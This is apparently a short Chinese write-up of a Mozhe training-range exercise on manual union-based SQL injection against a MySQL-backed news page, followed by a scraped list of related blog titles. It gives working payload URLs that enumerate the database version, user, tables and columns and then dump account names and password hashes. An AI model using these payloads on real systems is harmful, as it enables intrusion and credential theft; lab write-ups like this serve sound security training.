墨者 SQL手工注入漏洞测试(MySQL数据库)
- 测试注入点
http://124.70.64.48:40014/new_list.php?id=1sdaf
不显示,说明存在注入点
- order by
http://124.70.64.48:40014/new_list.php?id=1%20order%20by%205
报错猜解准备
http://124.70.64.48:40014/new_list.php?id=-1%20union%20select%201,2,3,4
- 查询信息(联合注入)(注意 id=后面需要用个错误的值,如-1)(version(),user(),database(),@@version_compile_os)
http://124.70.64.48:40014/new_list.php?id=-1%20union%20select%201,version(),database(),4
得到其信息分别为:
version() 5.7.22-0ubuntu0.16.04.1
database() mozhe_Discuz_StormGroup
user() root@localhost
@@version_compile_os Linux
- 查表得(StormGroup_member,notice)
http://124.70.64.48:40014/new_list.php?id=-1%20union%20select%201,group_concat(table_name)%20,3,4%20from%20information_schema.tables%20where%20table_schema=%27mozhe_Discuz_StormGroup%27
5.查列得(id,name,password,status)
http://124.70.64.48:40014/new_list.php?id=-1%20union%20select%201,group_concat(column_name)%20,3,4%20from%20information_schema.columns%20where%20table_name=%27StormGroup_member%27
6.查具体信息得账号密码,密码需MD5解密,然后登录后得key
http://124.70.64.48:40014/new_list.php?id=-1%20union%20select%201,group_concat(name),group_concat(password),4%20from%20StormGroup_member
7.emmm,最后登录不上去
墨者 SQL手工注入漏洞测试(MySQL数据库)相关推荐
- 墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入.同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清 ...
- 墨者学院01 SQL手工注入漏洞测试(MySQL数据库)
问题描述 鉴于我已经两周没能成功运行攻防世界的靶场环境...于是昨天又搜了一些网站,感觉墨者学院的题目还可以~ SQL手工注入虽然是一个已经被安全博主讲烂的主题,但是我之前很少有从头到尾实践手工注入的 ...
- 《墨者学院——SQL手工注入漏洞测试(MySQL数据库)》
作者: susususuao 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 一:思路 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭 ...
- 墨者靶场:SQL手工注入漏洞测试(MySQL数据库)
有一说一,本来是准备把笔记写在墨者的解题思路里的,结果不让写了,离谱 启动靶场后,会进入一个登录界面,界面下面有一个维修公告,打开公告. 1.判断有没有注入点: 219.153.49.228:4946 ...
- Oracle数据库注入-墨者学院(SQL手工注入漏洞测试(Oracle数据库))
本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(Oracle数据库). 地址:http://124.70.22.208:42948/new_list.php?id=1(注意地址已 ...
- 墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL手工注入漏洞测试(MongoDB数据库). 一.题目简介 我们这里采用墨者学院的MongoDB数据库渗透测试题目,其地址为:https:/ ...
- MongoDB数据库注入-墨者学院(SQL手工注入漏洞测试(MongoDB数据库))
本期来为大家讲解的sql注入题目是来墨者学院的SQL手工注入漏洞测试(MongoDB数据库). 地址:http://124.70.71.251:46804/new_list.php?id=1(注意这里 ...
- SQL手工注入漏洞测试(Oracle数据库)
SQL手工注入漏洞测试(Oracle数据库) 0x01前言 本文旨在讲述Oracle数据库多种情况下如何进行注入 靶场地址:SQL手工注入漏洞测试(Oracle数据库)_SQL注入_在线靶场_墨者学院 ...
- SQL手工注入漏洞测试(Db2数据库)
漏洞复现 用order by测试,发现可以,并测试到字段为4 用union select 1,2,3,4 发现失败 union select 1,2,3,4 from sysibm.systables ...
最新文章
- 前端开发中的性能那点事
- 2018-3-10论文(网络评论中非结构化信息表示与应用研究)-----综合评价的实例
- c语言判断2 1000素数,2是不是素数(C语言判断一个数为素数)
- 00后MIT美女学霸获2022年罗德奖学金!4位中国学霸入学牛津
- 穿着健美裤的美女,她们身材好是锻炼出来的
- 面试感悟—-一名3年工作经验的程序员应该具备的技能
- 实验1 熟悉实验环境
- cordova+vue 项目打包成Android(apk)应用
- 刘小乐教授 - 生物信息学云论坛第三场报告会
- java购物车后台_JavaWeb后台购物车类实现代码详解
- ubuntu wireshark找不到网卡及开启IP转发
- android relativelayout 垂直居中,RelativeLayout子控件垂直居中
- DOM控制video实现开始/暂停按钮思路方法
- 导出数据提示--secure-file-priv选项问题的解决方法
- 义冢oj P5033打气球
- React 面试题 回答
- html3d旋转效果相册,HTML5css3:3D旋转木马效果相册
- 血族第四季/全集The Strain迅雷下载
- eWebEditor的使用方法
- 央企招聘:正式编制!八险三金!各项福利!中国邮政招人啦!